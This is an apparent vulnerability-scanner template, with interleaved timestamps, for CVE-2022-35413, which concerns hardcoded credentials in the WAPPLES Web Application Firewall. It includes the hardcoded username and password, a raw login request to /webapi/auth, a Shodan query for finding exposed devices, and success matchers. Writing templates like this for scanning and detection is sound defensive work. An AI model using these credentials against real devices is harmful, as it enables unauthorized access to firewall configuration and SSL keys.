2022-09-14 04:04:03 +00:00
id : CVE-2022-35413
info :
2023-01-16 17:41:15 +00:00
name : WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials
2022-09-14 04:04:03 +00:00
author : For3stCo1d
severity : critical
description : |
2023-01-16 17:41:15 +00:00
WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
2022-09-14 04:04:03 +00:00
reference :
- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
2022-09-15 12:10:38 +00:00
- https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
2023-01-16 17:41:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35413
2023-07-11 19:49:27 +00:00
- https://www.pentasecurity.com/product/wapples/
2022-09-16 19:50:10 +00:00
classification :
2022-09-17 08:33:33 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-35413
2022-09-17 08:33:33 +00:00
cwe-id : CWE-798
2023-07-11 19:49:27 +00:00
epss-score : 0.8597
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
2022-09-14 04:04:03 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-09-14 10:28:21 +00:00
shodan-query : http.title:"Intelligent WAPPLES"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : pentasecurity
product : wapples
2022-09-14 04:04:03 +00:00
tags : cve,cve2022,wapples,firewall,default-login
2023-04-27 04:28:59 +00:00
http :
2022-09-14 04:04:03 +00:00
- raw :
- |
POST /webapi/auth HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-09-14 10:28:21 +00:00
id={{username}}&password={{password}}
payloads :
username :
- systemi
password :
- db/wp.no1
2023-07-11 19:49:27 +00:00
attack : pitchfork
2022-09-14 04:04:03 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"res_msg":"Authentication Success."'
- '"doc_id":"user_systemi"'
condition : and
- type : word
part : header
words :
- WP_SESSID=
- type : status
status :
- 200